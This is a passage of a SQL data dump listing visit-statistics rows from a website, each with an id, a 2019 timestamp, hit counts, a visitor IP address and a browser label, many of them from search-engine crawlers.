3,0,0,'66.249.64.28','chrome'),(459353,1572776015,1,1,0,0,'66.249.64.27','chrome'),(459354,1572776599,1,1,0,0,'218.30.103.154','other'),(459355,1572776871,1,1,0,0,'207.46.13.72','other'),(459356,1572776977,1,1,0,0,'176.226.152.92','chrome'),(459357,1572777282,1,1,0,0,'66.249.64.28','chrome'),(459358,1572777608,1,1,0,0,'207.46.13.185','other'),(459359,1572778516,1,1,0,0,'66.249.64.26','chrome'),(459360,1572778871,1,1,0,0,'66.249.64.28','chrome'),(459361,1572779898,1,1,0,0,'207.46.13.185','other'),(459362,1572780088,2,2,0,0,'66.249.64.28','chrome'),(459363,1572780342,1,1,0,0,'91.209.11.236','other'),(459364,1572780634,1,1,0,0,'207.46.13.72','other'),(459365,1572780679,1,1,0,0,'66.249.64.26','chrome'),(459366,1572780816,1,1,0,0,'109.74.154.72','chrome'),(459367,1572782015,2,2,0,0,'207.46.13.185','other'),(459368,1572782135,5,5,0,0,'157.55.39.4','other'),(459369,1572782285,1,1,0,0,'207.46.13.72','other'),(459370,1572782637,1,1,0,0,'46.211.149.105','chrome'),(459371,1572783047,1,1,0,0,'207.46.13.185','other'),(459372,1572783124,1,1,0,0,'66.249.64.26','chrome'),(459373,1572783644,1,1,0,0,'157.55.39.176','other'),(459374,1572783896,1,1,0,0,'207.46.13.72','other'),(459375,1572784009,2,2,0,0,'8.29.198.27','other'),(459376,1572785881,1,1,0,0,'157.55.39.4','other'),(459377,1572785913,1,1,0,0,'213.159.213.137','chrome'),(459378,1572786293,1,1,0,0,'66.249.64.26','chrome'),(459379,1572786546,1,1,0,0,'66.249.70.36','chrome'),(459380,1572786972,1,1,0,0,'66.249.64.28','chrome'),(459381,1572787584,1,1,0,0,'157.55.39.4','other'),(459382,1572788006,2,2,0,0,'207.46.13.72','other'),(459383,1572788783,2,2,0,0,'66.249.64.28','chrome'),(459384,1572789710,1,1,0,0,'66.249.70.33','chrome'),(459385,1572791667,1,1,0,0,'66.249.70.36','chrome'),(459386,1572791735,1,1,0,0,'66.249.64.27','chrome'),(459387,1572793944,1,1,0,0,'91.196.178.91','firefox'),(459388,1572793982,1,1,0,0,'141.8.142.50','other'),(459389,1572794299,3,3,0,0,'207.46.13.32','other'),(459390,1572794875,1,1,0,0,'8.29.198.26','other'),(459391,1572795119,1,1,0,0,'37.9.113.33','other'),(459392,1572795159,1,1,0,0,'37.9.113.202','other'),(459393,1572795405,1,1,0,0,'66.249.64.28','chrome'),(459394,1572795706,1,1,0,0,'8.29.198.27','other'),(459395,1572796088,1,1,0,0,'94.242.203.243','chrome'),(459396,1572796321,1,1,0,0,'207.46.13.32','other'),(459397,1572796737,1,1,0,0,'66.249.64.27','chrome'),(459398,1572797211,1,1,0,0,'31.13.127.3','other'),(459399,1572797212,3,3,0,0,'31.13.127.1','other'),(459404,1572797977,1,1,0,0,'157.55.39.156','other'),(459405,1572798698,1,1,0,0,'66.249.64.27','chrome'),(459406,1572799493,1,1,0,0,'157.55.39.156','other'),(459407,1572800023,1,1,0,0,'95.132.49.104','firefox'),(459408,1572800817,1,1,0,0,'66.249.70.36','chrome'),(459409,1572800999,1,1,0,0,'193.106.30.99','chrome'),(459410,1572801169,1,1,0,0,'66.249.64.27','chrome'),(459411,1572803091,1,1,0,0,'66.249.64.27','chrome'),(459412,1572803283,1,1,0,0,'66.249.64.26','chrome'),(459413,1572803453,2,2,0,0,'207.46.13.62','other'),(459414,1572805717,1,1,0,0,'8.29.198.27','other'),(459415,1572806562,1,1,0,0,'8.29.198.25','other'),(459416,1572807389,1,1,0,0,'188.163.113.162','chrome'),(459417,1572807516,1,1,0,0,'130.180.210.83','chrome'),(459418,1572808615,1,1,0,0,'157.55.39.156','other'),(459419,1572808795,1,1,0,0,'207.46.13.62','other'),(459420,1572810355,1,1,0,0,'207.46.13.62','other'),(459421,1572810437,1,1,0,0,'37.9.113.97','other'),(459422,1572811566,1,1,0,0,'157.55.39.208','other'),(459423,1572811745,1,1,0,0,'37.9.113.10','other'),(459424,1572812737,1,1,0,0,'157.55.39.156','other'),(459425,1572812914,1,1,0,0,'178.154.171.7','other'),(459426,1572813089,1,1,0,0,'141.8.183.18','other'),(459427,1572813211,1,1,0,0,'157.55.39.208','other'),(459428,1572813657,1,1,0,0,'141.8.142.119','other'),(459429,1572813891,2,2,0,0,'141.8.188.25','other'),(459430,1572814135,3,3,0,0,'207.46.13.62','other'),(459431,1572815530,1,1,0,0,'91.196.178.136','chrome'),(459432,1572815716,120,120,0,0,'95.216.19.59','other'),(459433,1572815871,1,1,0,0,'157.55.39.208','other'),(459434,1572816403,1,1,0,0,'157.55.39.149','other'),(459435,1572816555,1,1,0,0,'8.29.198.27','other'),(459436,1572816741,34,34,0,0,'95.216.19.59','other'),(459437,1572816828,1,1,0,0,'5.3.239.138','msie'),(459438,1572816860,2,2,0,0,'157.55.39.208','other'),(459439,1572817417,1,1,0,0,'8.29.198.26','other'),(459440,1572817429,2,2,0,0,'207.46.13.62','other'),(459441,1572818239,1,1,0,0,'178.154.200.33','other'),(459442,1572818795,1,1,0,0,'138.197.1.253','other'),(459443,1572820519,1,1,0,0,'66.249.64.28','chrome'),(459444,1572820602,1,1,0,0,'207.46.13.62','other'),(459445,1572820647,4,4,0,0,'158.69.243.138','other'),(459446,1572821389,1,1,0,0,'66.249.70.62','chrome'),(459447,1572821417,1,1,0,0,'141.8.183.18','other'),(459448,1572823946,2,2,0,0,'157.55.39.208','other'),(459449,1572824259,1,0,1,0,'51.83.19.253',''),(459450,1572824352,2,2,0,0,'157.55.39.149','other'),(459451,1572824671,1,1,0,0,'207.46.13.56','other'),(459452,1572824891,1,1,0,0,'141.8.183.33','other'),(459453,1572824913,3,3,0,0,'66.249.64.26','chrome'),(459454,1572825120,1,1,0,0,'66.249.64.28','chrome'),(459455,1572825198,1,1,0,0,'213.180.203.44','other'),(459456,1572825580,1,1,0,0,'207.46.13.62','other'),(459457,1572825650,1,1,0,0,'141.8.142.164','other'),(459458,1572825792,1,1,0,0,'66.249.64.27','chrome'),(459459,1572825960,3,3,0,0,'66.249.64.26','chrome'),(459460,1572826042,1,1,0,0,'5.45.207.65','other'),(459461,1572827118,1,1,0,0,'134.209.165.83','other'),(459462,1572827402,1,1,0,0,'8.29.198.26','other'),(459463,1572827557,1,1,0,0,'141.8.132.2','other'),(459464,1572827756,1,1,0,0,'37.9.113.202','other'),(459465,1572828026,1,1,0,0,'157.55.39.149','other'),(459466,1572828260,1,1,0,0,'207.46.13.62','other'),(459467,1572828274,1,1,0,0,'8.29.198.27','other'),(459468,1572828472,1,1,0,0,'66.249.70.33','chrome'),(459469,1572829587,3,3,0,0,'66.249.64.28','chrome'),(459470,1572829869,2,2,0,0,'66.249.64.26','chrome'),(459471,1572830714,1,1,0,0,'66.249.64.27','chrome'),(459472,1572830905,2,2,0,0,'157.55.39.226','other'),(459473,1572831208,1,1,0,0,'66.249.64.28','chrome'),(459474,1572831241,1,1,0,0,'66.249.64.26','chrome'),(459475,1572831272,1,1,0,0,'95.108.181.104','other'),(459476,1572831342,1,1,0,0,'141.8.132.12','other'),(459477,1572831369,1,1,0,0,'141.8.132.37','other'),(459478,1572831749,1,1,0,0,'66.249.64.27','chrome'),(459479,1572832615,2,2,0,0,'66.249.64.26','chrome'),(459480,1572833076,1,1,0,0,'66.249.64.28','chrome'),(459481,1572833083,1,1,0,0,'157.55.39.226','other'),(459482,1572833147,1,1,0,0,'207.46.13.56','other'),(459483,1572833482,6,6,0,0,'66.249.64.27','chrome'),(459484,1572833600,1,1,0,0,'66.249.64.26','chrome'),(459485,1572833834,1,1,0,0,'207.46.13.62','other'),(459486,1572834196,2,2,0,0,'66.249.64.28','chrome'),(459487,1572835540,1,1,0,0,'66.249.64.26','chrome'),(459488,1572835717,1,1,0,0,'157.55.39.149','other'),(459489,1572836385,1,1,0,0,'37.9.113.33','other'),(459490,1572836788,2,2,0,0,'66.249.64.27','chrome'),(459491,1572837134,1,1,0,0,'66.249.70.62','chrome'),(459492,1572837497,2,2,0,0,'66.249.64.26','chrome'),(459493,1572837778,1,1,0,0,'157.55.39.226','other'),(459494,1572837951,3,3,0,0,'66.249.64.27','chrome'),(459495,1572838260,2,2,0,0,'8.29.198.25','other'),(459496,1572838598,1,1,0,0,'141.8.142.177','other'),(459497,1572838800,2,2,0,0,'66.249.64.28','chrome'),(459498,1572839058,1,1,0,0,'66.249.70.33','chrome'),(459499,1572839659,1,1,0,0,'157.55.39.226','other'),(459500,1572839739,1,1,0,0,'66.249.64.26','chrome'),(459501,1572839875,1,1,0,0,'178.154.200.33','other'),(459502,1572841218,1,1,0,0,'66.249.70.36','chrome'),(459503,1572841564,1,1,0,0,'66.249.64.27','chrome'),(459504,1572843674,1,1,0,0,'66.249.64.28','chrome'),(459505,1572843839,1,1,0,0,'207.46.13.62','other'),(459506,1572844379,2,2,0,0,'157.55.39.226','other'),(459507,1572844696,1,1,0,0,'66.249.64.28','chrome'),(459508,1572846598,1,1,0,0,'66.249.64.28','chrome'),(459509,1572847488,1,1,0,0,'66.102.9.161','chrome'),(459510,1572848005,1,1,0,0,'95.108.181.103','other'),(459511,1572848066,1,1,0,0,'5.45.207.49','other'),(459512,1572849045,1,1,0,0,'66.249.64.28','chrome'),(459513,1572849096,1,1,0,0,'157.55.39.149','other'),(459514,1572849098,1,1,0,0,'8.29.198.26','other'),(459515,1572849115,1,1,0,0,'157.55.39.226','other'),(459516,1572849154,1,1,0,0,'94.103.95.53','chrome'),(459517,1572849372,2,2,0,0,'207.46.13.62','other'),(459518,1572849748,1,1,0,0,'141.8.142.164','other'),(459519,1572849979,1,1,0,0,'8.29.198.27','other'),(459520,1572849998,1,1,0,0,'212.224.113.72','chrome'),(459521,1572850431,1,1,0,0,'178.154.171.66','other'),(459522,1572850715,2,2,0,0,'66.249.64.27','chrome'),(459523,1572850804,1,1,0,0,'207.46.13.62','other'),(459524,1572852320,1,1,0,0,'157.55.39.149','other'),(459525,1572853196,1,1,0,0,'178.154.200.60','other'),(459526,1572853830,1,1,0,0,'46.133.153.103','chrome'),(459527,1572854041,1,1,0,0,'5.45.207.49','other'),(459528,1572854475,1,1,0,0,'89.163.239.216','firefox'),(459529,1572854632,1,1,0,0,'66.249.64.27','chrome'),(459530,1572854817,1,1,0,0,'46.211.241.6','chrome'),(459531,1572855295,1,1,0,0,'37.9.113.33','other'),(459532,1572856057,2,2,0,0,'91.196.178.79','chrome'),(459533,1572856593,1,1,0,0,'194.44.223.54','chrome'),(459534,1572857446,1,1,0,0,'66.249.64.26','chrome'),(459535,1572857519,3,3,0,0,'66.249.64.27','chrome'),(459536,1572857836,1,1,0,0,'66.249.70.36','chrome'),(459537,1572859033,1,1,0,0,'157.55.39.226','other'),(459538,1572859351,1,1,0,0,'194.44.223.54','chrome'),(459539,1572859729,1,1,0,0,'178.154.200.13','other'),(459540,1572859959,1,1,0,0,'8.29.198.27','other'),(459541,1572860541,2,2,0,0,'66.249.64.26','chrome'),(459542,1572860841,1,1,0,0,'37.9.113.33','other'),(459543,1572860861,1,1,0,0,'141.8.188.12','other'),(459544,1572860867,1,1,0,0,'8.29.198.26','other'),(459545,1572860918,1,1,0,0,'66.249.64.27','chrome'),(459546,1572861102,1,1,0,0,'91.196.178.89','firefox'),(459547,1572861701,1,1,0,0,'18.223.108.117','chrome'),(459548,1572862274,2,2,0,0,'66.249.64.26','chrome'),(459549,1572862672,2,2,0,0,'157.55.39.226','other'),(459550,1572863019,1,1,0,0,'69.171.251.9','other'),(459551,1572863210,1,1,0,0,'37.9.113.202','other'),(459552,1572863634,1,1,0,0,'66.249.64.27','chrome'),(459553,1572864293,1,1,0,0,'66.249.64.26','chrome'),(459554,1572864393,1,1,0,0,'195.10.210.49','chrome'),(459555,1572864703,1,1,0,0,'194.44.223.54','chrome'),(459556,1572865626,1,1,0,0,'157.55.39.226','other'),(459557,1572865706,1,1,0,0,'193.106.30.99','chrome'),(459558,1572865711,1,1,0,0,'178.154.200.33','other'),(459559,1572866034,1,1,0,0,'66.249.70.62','chrome'),(459560,1572866584,2,2,0,0,'157.55.39.226','other'),(459561,1572866589,1,1,0,0,'95.132.49.104','firefox'),(459562,1572866640,1,1,0,0,'173.252.95.11','other'),(459563,1572867024,1,1,0,0,'37.9.113.202','other'),(459564,1572867040,1,1,0,0,'207.46.13.62','other'),(459565,1572867045,1,1,0,0,'207.46.13.132','other'),(459566,1572867519,1,1,0,0,'66.249.64.26','chrome'),(459567,1572867521,1,1,0,0,'66.249.64.27','chrome'),(459568,1572867528,1,1,0,0,'95.84.223.67','msie'),(459569,1572867940,1,1,0,0,'95.132.49.104','firefox'),(459570,1572867952,1,1,0,0,'207.46.13.62','other'),(459571,1572867973,1,1,0,0,'167.88.7.134','other'),(459572,1572868306,1,1,0,0,'141.8.188.25','other'),(459573,1572868445,1,1,0,0,'176.111.33.18','firefox'),(459574,1572868722,2,2,0,0,'91.196.178.169','chrome'),(459575,1572868935,1,1,0,0,'157.55.39.226','other'),(459576,1572869163,1,1,0,0,'207.46.13.62','other'),(459577,1572869524,1,1,0,0,'37.9.113.33','other'),(459578,1572869993,1,1,0,0,'195.10.210.49','chrome'),(459579,1572870131,16,16,0,0,'54.39.99.118','chrome'),(459580,1572870224,1,1,0,0,'207.46.13.62','other'),(459581,1572870269,1,1,0,0,'157.55.39.226','other'),(459582,1572870758,1,1,0,0,'91.196.178.93','chrome'),(459583,1572870834,1,1,0,0,'8.29.198.25','other'),(459584,1572871752,1,1,0,0,'8.29.198.26','other'),(459585,1572871900,1,1,0,0,'92.112.229.7','firefox'),(459586,1572872427,1,1,0,0,'66.249.64.26','chrome'),(459587,1572872531,1,1,0,0,'109.74.154.72','chrome'),(459588,1572872861,1,1,0,0,'194.44.223.54','chrome'),(459589,1572873318,1,1,0,0,'66.249.70.33','chrome'),(459590,1572873426,1,1,0,0,'5.45.207.49','other'),(459591,1572873454,2,2,0,0,'66.249.64.27','chrome'),(459592,1572873470,1,1,0,0,'66.249.64.26','chrome'),(459593,1572873737,1,1,0,0,'157.55.39.226','other'),(459594,1572873825,1,1,0,0,'92.112.229.7','firefox'),(459595,1572873859,1,1,0,0,'91.196.178.174','chrome'),(459596,1572874533,1,1,0,0,'66.249.70.62','chrome'),(459597,1572875190,1,1,0,0,'194.44.223.54','chrome'),(459598,1572875259,1,1,0,0,'91.196.178.79','chrome'),(459599,1572875620,1,1,0,0,'178.154.200.33','other'),(459600,1572875625,1,1,0,0,'141.8.188.12','other'),(459601,1572875656,1,1,0,0,'141.8.142.164','other'),(459602,1572876418,1,1,0,0,'194.44.223.54','chrome'),(459603,1572876958,1,1,0,0,'173.252.95.21','other'),(459604,1572877167,1,1,0,0,'91.196.178.79','chrome'),(459605,1572878033,1,1,0,0,'141.8.142.115','other'),(459606,1572878048,1,1,0,0,'141.8.132.37','other'),(459607,1572878595,1,1,0,0,'5.196.92.91','firefox'),(459608,1572878612,2,2,0,0,'207.46.13.110','other'),(459609,1572880385,1,1,0,0,'157.55.39.93','other'),(459610,1572880534,1,1,0,0,'157.55.39.226','other'),(459611,1572881188,1,1,0,0,'207.46.13.110','other'),(459612,1572881323,2,2,0,0,'91.204.213.22','chrome'),(459613,1572881710,1,1,0,0,'8.29.198.26','other'),(459614,1572881711,1,1,0,0,'5.45.207.65','other'),(459615,1572882634,1,1,0,0,'8.29.198.26','other'),(459616,1572882675,1,1,0,0,'207.46.13.110','other'),(459617,1572882876,1,1,0,0,'141.8.142.119','other'),(459618,1572883603,1,1,0,0,'207.46.13.110','other'),(459619,1572884085,1,1,0,0,'207.46.13.132','other'),(459620,1572884277,1,1,0,0,'141.8.142.164','other'),(459621,1572884294,1,1,0,0,'37.9.113.163','other'),(459622,1572884484,1,1,0,0,'141.8.188.12','other'),(459623,1572884779,1,1,0,0,'46.96.50.144','chrome'),(459624,1572885601,1,1,0,0,'207.46.13.110','other'),(459625,1572885699,1,1,0,0,'157.55.39.93','other'),(459626,1572885908,1,1,0,0,'157.55.39.226','other'),(459627,1572887381,1,1,0,0,'157.55.39.226','other'),(459628,1572887671,1,1,0,0,'157.55.39.93','other'),(459629,1572888434,1,1,0,0,'157.55.39.226','other'),(459630,1572888884,1,1,0,0,'91.196.178.88','firefox'),(459631,1572889126,1,1,0,0,'95.108.181.104','other'),(459632,1572889962,1,1,0,0,'157.55.39.226','other'),(459633,1572889971,1,1,0,0,'157.55.39.93','other'),(459634,1572890104,1,1,0,0,'207.46.13.132','other'),(459635,1572890413,1,1,0,0,'178.154.200.27','other'),(459636,1572890453,1,1,0,0,'178.154.171.66','other'),(459637,1572890648,1,1,0,0,'46.211.246.20','chrome'),(459638,1572890896,2,2,0,0,'157.55.39.226','other'),(459639,1572891202,1,1,0,0,'157.55.39.93','other'),(459640,1572891517,1,1,0,0,'178.154.200.71','other'),(459641,1572891549,1,1,0,0,'141.8.188.25','other'),(459642,1572892539,2,2,0,0,'207.46.13.110','other'),(459643,1572892600,1,1,0,0,'8.29.198.25','other'),(459644,1572892865,1,1,0,0,'37.9.113.163','other'),(459645,1572892873,1,1,0,0,'141.8.183.15','other'),(459646,1572893498,1,1,0,0,'8.29.198.26','other'),(459647,1572893708,1,1,0,0,'157.55.39.93','other'),(459648,1572894168,1,1,0,0,'207.46.13.110','other'),(459649,1572894445,1,1,0,0,'157.55.39.226','other'),(459650,1572895043,1,1,0,0,'213.180.203.37','other'),(459651,1572896011,2,2,0,0,'157.55.39.93','other'),(459652,1572896330,1,1,0,0,'213.180.203.37','other'),(459653,1572896756,2,2,0,0,'213.180.203.44','other'),(459654,1572897046,1,1,0,0,'66.249.64.26','chrome'),(459655,1572897429,1,0,1,0,'66.249.70.36',''),(459656,1572897485,1,1,0,0,'141.8.142.2','other'),(459657,1572897507,1,1,0,0,'178.154.200.33','other'),(459658,1572897696,1,1,0,0,'157.55.39.93','other'),(459659,1572898487,2,2,0,0,'95.213.141.126','opera'),(459660,1572898574,1,1,0,0,'46.211.146.154','chrome'),(459661,1572898688,1,1,0,0,'157.55.39.190','other'),(459662,1572898715,2,2,0,0,'213.180.203.44','other'),(459663,1572899273,1,1,0,0,'66.249.64.27','chrome'),(459664,1572900157,1,1,0,0,'157.55.39.93','other'),(459665,1572900983,1,1,0,0,'141.8.142.2','other'),(459666,1572901343,2,2,0,0,'66.249.64.27','chrome'),(459667,1572901360,1,1,0,0,'66.249.64.26','chrome'),(459668,1572901817,1,1,0,0,'157.55.39.190','other'),(459669,1572903090,1,1,0,0,'213.180.203.44','other'),(459670,1572903467,1,1,0,0,'8.29.198.26','other'),(459671,1572903633,2,2,0,0,'157.55.39.226','other'),(459672,1572904220,1,1,0,0,'46.120.255.82','chrome'),(459673,1572904224,1,1,0,0,'213.180.203.44','other'),(459674,1572904374,1,1,0,0,'8.29.198.26','other'),(459675,1572904711,1,1,0,0,'66.249.64.28','chrome'),(459676,1572904853,1,1,0,0,'178.175.132.28','msie'),(459677,1572905197,5,5,0,0,'60.191.38.77','firefox'),(459679,1572905864,1,1,0,0,'157.55.39.190','other'),(459680,1572907792,1,1,0,0,'213.180.203.44','other'),(459681,1572908436,1,1,0,0,'157.55.39.190','other'),(459682,1572909201,1,1,0,0,'209.17.97.90','other'),(459683,1572910560,1,1,0,0,'87.250.224.90','other'),(459684,1572910999,1,1,0,0,'157.55.39.90','other'),(459685,1572911776,2,0,2,0,'157.55.39.181',''),(459686,1572911928,1,1,0,0,'178.154.200.33','other'),(459687,1572911991,1,1,0,0,'141.8.142.2','other'),(459688,1572912526,1,1,0,0,'157.55.39.213','other'),(459689,1572913095,2,2,0,0,'213.180.203.44','other'),(459690,1572914318,1,1,0,0,'8.29.198.25','other'),(459691,1572915072,1,0,1,0,'157.55.39.90',''),(459692,1572915259,1,1,0,0,'8.29.198.26','other'),(459693,1572915394,1,0,1,0,'157.55.39.213',''),(459694,1572915419,1,1,0,0,'37.9.113.10','other'),(459695,1572917078,1,1,0,0,'157.55.39.213','other'),(459696,1572917896,2,2,0,0,'213.180.203.44','other'),(459697,1572918072,1,1,0,0,'66.249.70.36','chrome'),(459698,1572921029,1,1,0,0,'157.55.39.181','other'),(459699,1572921691,1,0,1,0,'157.55.39.90',''),(459700,1572921720,1,1,0,0,'173.252.87.38','other'),(459701,1572922108,2,2,0,0,'213.180.203.44','other'),(459702,1572923186,1,1,0,0,'66.249.64.27','chrome'),(459703,1572923861,1,1,0,0,'213.180.203.37','other'),(459704,1572924279,1,1,0,0,'66.249.70.62','chrome'),(459705,1572924884,1,1,0,0,'157.55.39.181','other'),(459706,1572925262,2,2,0,0,'8.29.198.25','other'),(459707,1572926354,2,2,0,0,'66.249.64.27','chrome'),(459708,1572926382,1,1,0,0,'173.252.95.25','other'),(459709,1572928657,1,0,1,0,'157.55.39.90',''),(459710,1572929057,2,2,0,0,'157.55.39.181','other'),(459711,1572930085,1,0,1,0,'157.55.39.90',''),(459712,1572930465,1,1,0,0,'141.8.132.37','other'),(459713,1572930510,1,1,0,0,'157.55.39.90','other'),(459714,1572931613,1,0,1,0,'157.55.39.90',''),(459715,1572931833,1,1,0,0,'66.249.64.26','chrome'),(459716,1572932284,1,1,0,0,'157.55.39.187','other'),(459717,1572932574,1,1,0,0,'185.41.128.73','chrome'),(459718,1572932915,2,2,0,0,'66.249.64.26','chrome'),(459719,1572932919,1,1,0,0,'141.8.142.177','other'),(459720,1572932931,1,1,0,0,'66.249.64.27','chrome'),(459721,1572936149,2,2,0,0,'8.29.198.26','other'),(459722,1572936591,1,1,0,0,'66.249.64.27','chrome'),(459723,1572937110,1,1,0,0,'5.255.253.8','other'),(459724,1572937668,1,1,0,0,'37.9.113.10','other'),(459725,1572939567,1,1,0,0,'141.8.132.2','other'),(459726,1572939608,2,2,0,0,'213.180.203.44','other'),(459727,1572941001,1,1,0,0,'207.46.13.12','other'),(459728,1572941366,1,1,0,0,'194.44.223.54','chrome'),(459729,1572941911,1,1,0,0,'157.55.39.187','other'),(459730,1572942225,1,1,0,0,'213.180.203.44','other'),(459731,1572942237,1,1,0,0,'213.180.203.37','other'),(459732,1572943109,1,1,0,0,'194.44.223.54','chrome'),(459733,1572943392,2,2,0,0,'213.180.203.44','other'),(459734,1572943844,2,2,0,0,'157.55.39.187','other'),(459735,1572944221,1,1,0,0,'194.44.223.54','chrome'),(459736,1572944552,1,1,0,0,'91.196.178.79','chrome'),(459737,1572945656,1,1,0,0,'66.249.64.27','chrome'),(459738,1572945895,1,1,0,0,'213.180.203.44','other'),(459739,1572946407,1,1,0,0,'194.44.223.54','chrome'),(459740,1572947023,2,2,0,0,'8.29.198.25','other'),(459741,1572947208,1,1,0,0,'91.196.178.66','chrome'),(459742,1572947405,1,1,0,0,'194.44.223.54','chrome'),(459743,1572948517,1,1,0,0,'207.46.13.179','other'),(459744,1572948528,1,1,0,0,'194.44.223.54','chrome'),(459745,1572949265,1,1,0,0,'91.196.177.15','chrome'),(459746,1572949866,1,1,0,0,'207.46.13.12','other'),(459747,1572950823,2,2,0,0,'213.180.203.37','other'),(459748,1572950830,3,3,0,0,'213.180.203.44','other'),(459749,1572951665,2,2,0,0,'157.55.39.187','other'),(459750,1572952117,1,1,0,0,'207.46.13.12','other'),(459751,1572952120,1,1,0,0,'213.180.203.44','other'),(459752,1572952694,1,1,0,0,'91.196.178.99','chrome'),(459753,1572953213,1,1,0,0,'31.13.115.29','other'),(459754,1572953349,1,1,0,0,'141.8.142.2','other'),(459755,1572954632,1,1,0,0,'213.180.203.44','other'),(459756,1572954716,2,2,0,0,'207.46.13.179','other'),(459757,1572956001,1,1,0,0,'213.180.203.44','other'),(459758,1572956151,1,1,0,0,'213.180.203.37','other'),(459759,1572956664,1,1,0,0,'66.249.64.28','chrome'),(459760,1572957409,1,1,0,0,'91.196.178.130','firefox'),(459761,1572957882,2,2,0,0,'8.29.198.27','other'),(459762,1572959952,2,2,0,0,'213.180.203.44','other'),(459763,1572959991,1,1,0,0,'66.249.64.28','chrome'),(459764,1572960197,1,1,0,0,'157.55.39.187','other'),(459765,1572960296,1,1,0,0,'45.148.10.40','other'),(459766,1572960510,1,1,0,0,'66.249.70.36','chrome'),(459767,1572960710,1,1,0,0,'91.196.178.188','chrome'),(459768,1572960836,3,3,0,0,'157.55.39.250','other'),(459769,1572961113,2,2,0,0,'207.46.13.12','other'),(459770,1572961564,1,1,0,0,'207.46.13.179','other'),(459771,1572961992,1,1,0,0,'66.249.64.27','chrome'),(459772,1572962910,1,1,0,0,'5.45.207.65','other'),(459773,1572963299,1,1,0,0,'141.8.132.12','other'),(459774,1572963553,1,1,0,0,'66.249.64.27','chrome'),(459775,1572963682,1,1,0,0,'109.74.154.72','chrome'),(459776,1572964403,1,1,0,0,'141.8.142.2','other'),(459777,1572964468,1,0,1,0,'157.55.39.250',''),(459778,1572965014,1,1,0,0,'66.249.64.28','chrome'),(459779,1572965104,1,1,0,0,'66.249.64.26','chrome'),(459780,1572965840,1,1,0,0,'157.55.39.250','other'),(459781,1572965841,1,1,0,0,'213.180.203.37','other'),(459782,1572966107,1,1,0,0,'91.196.178.72','chrome'),(459783,1572966192,2,2,0,0,'66.249.64.27','chrome'),(459784,1572966310,1,1,0,0,'66.249.70.33','chrome'),(459785,1572967110,1,1,0,0,'141.8.142.161','other'),(459786,1572967116,2,2,0,0,'213.180.203.44','other'),(459787,1572967118,1,1,0,0,'66.249.64.28','chrome'),(459788,1572967277,1,1,0,0,'66.249.64.27','chrome'),(459789,1572967386,1,1,0,0,'157.55.39.187','other'),(459790,1572968370,4,4,0,0,'66.249.64.27','chrome'),(459791,1572968782,1,1,0,0,'8.29.198.25','other'),(459792,1572968879,2,2,0,0,'66.249.64.28','chrome'),(459793,1572968905,2,2,0,0,'66.249.64.26','chrome'),(459794,1572969603,1,1,0,0,'8.29.198.26','other'),(459795,1572969623,1,1,0,0,'66.249.64.27','chrome'),(459796,1572970274,1,1,0,0,'141.8.142.2','other'),(459797,1572970307,1,1,0,0,'213.180.203.44','other'),(459798,1572970562,1,1,0,0,'91.196.178.74','firefox'),(459799,1572970573,1,1,0,0,'213.180.203.37','other'),(459800,1572971363,4,4,0,0,'66.249.64.26','chrome'),(459801,1572971440,3,3,0,0,'66.249.64.28','chrome'),(459802,1572971664,1,1,0,0,'141.8.142.177','other'),(459803,1572971687,1,1,0,0,'37.9.113.33','other'),(459804,1572971717,1,1,0,0,'66.249.64.27','chrome'),(459805,1572971738,1,1,0,0,'95.108.181.103','other'),(459806,1572971740,1,1,0,0,'66.249.70.62','chrome'),(459807,1572971885,2,2,0,0,'207.46.13.12','other'),(459808,1572971888,1,1,0,0,'91.196.178.72','firefox'),(459809,1572972562,1,1,0,0,'66.249.64.28','chrome'),(459810,1572972805,2,2,0,0,'66.249.64.27','chrome'),(459811,1572972881,1,1,0,0,'94.153.101.5','chrome'),(459812,1572973278,1,1,0,0,'5.62.18.65','chrome'),(459813,1572973282,1,1,0,0,'66.249.70.62','chrome'),(459814,1572973327,1,0,1,0,'157.55.39.187',''),(459815,1572973338,1,1,0,0,'207.46.13.12','other'),(459816,1572973685,1,1,0,0,'66.249.64.26','chrome'),(459817,1572974404,1,1,0,0,'95.108.181.103','other'),(459818,1572974750,1,1,0,0,'66.249.64.27','chrome'),(459819,1572974989,1,1,0,0,'91.196.178.61','chrome'),(459820,1572975165,1,1,0,0,'54.36.149.62','other'),(459821,1572975414,1,1,0,0,'66.249.64.26','chrome'),(459822,1572975722,1,1,0,0,'54.36.149.23','other'),(459823,1572975949,1,1,0,0,'66.249.70.33','chrome'),(459824,1572976460,1,1,0,0,'54.36.149.2','other'),(459825,1572977247,1,1,0,0,'141.8.188.18','other'),(459826,1572977816,1,1,0,0,'207.46.13.12','other'),(459827,1572978001,1,1,0,0,'66.249.64.28','chrome'),(459828,1572978190,1,1,0,0,'46.211.238.75','chrome'),(459829,1572978472,1,1,0,0,'178.154.171.66','other'),(459830,1572978480,1,1,0,0,'95.108.213.3','other'),(459831,1572978618,1,1,0,0,'157.55.39.187','other'),(459832,1572979132,1,1,0,0,'66.249.70.62','chrome'),(459833,1572979210,1,1,0,0,'66.249.64.28','chrome'),(459834,1572979658,1,1,0,0,'8.29.198.25','other'),(459835,1572980083,1,1,0,0,'157.55.39.187','other'),(459836,1572980483,1,1,0,0,'8.29.198.26','other'),(459837,1572980944,1,1,0,0,'37.9.113.33','other'),(459838,1572981106,1,1,0,0,'77.111.244.134','chrome'),(459839,1572981428,1,1,0,0,'141.8.188.12','other'),(459840,1572981672,1,1,0,0,'66.249.70.62','chrome'),(459841,1572982089,1,1,0,0,'141.8.183.18','other'),(459842,1572982092,1,1,0,0,'95.108.213.3','other'),(459843,1572982128,1,1,0,0,'37.9.113.202','other'),(459844,1572982131,1,1,0,0,'141.8.142.132','other'),(459845,1572983330,1,1,0,0,'66.249.64.27','chrome'),(459846,1572983395,1,1,0,0,'141.8.142.119','other'),(459847,1572983552,1,1,0,0,'66.249.64.26','chrome'),(459848,1572984335,2,2,0,0,'66.249.70.62','chrome'),(459849,1572984586,1,1,0,0,'54.36.149.7','other'),(459850,1572985460,2,2,0,0,'141.8.183.33','other'),(459851,1572985698,1,1,0,0,'141.8.188.12','other'),(459852,1572986792,1,1,0,0,'178.154.200.60','other'),(459853,1572988436,1,1,0,0,'66.249.70.33','chrome'),(459854,1572988460,1,1,0,0,'141.8.142.119','other'),(459855,1572988640,1,1,0,0,'66.249.64.26','chrome'),(459856,1572988990,1,1,0,0,'141.8.183.18','other'),(459857,1572989014,1,1,0,0,'213.180.203.37','other'),(459858,1572989173,1,1,0,0,'37.9.113.202','other'),(459859,1572989192,1,1,0,0,'66.249.64.28','chrome'),(459860,1572989269,1,1,0,0,'88.99.2.203','other'),(459861,1572989277,1,1,0,0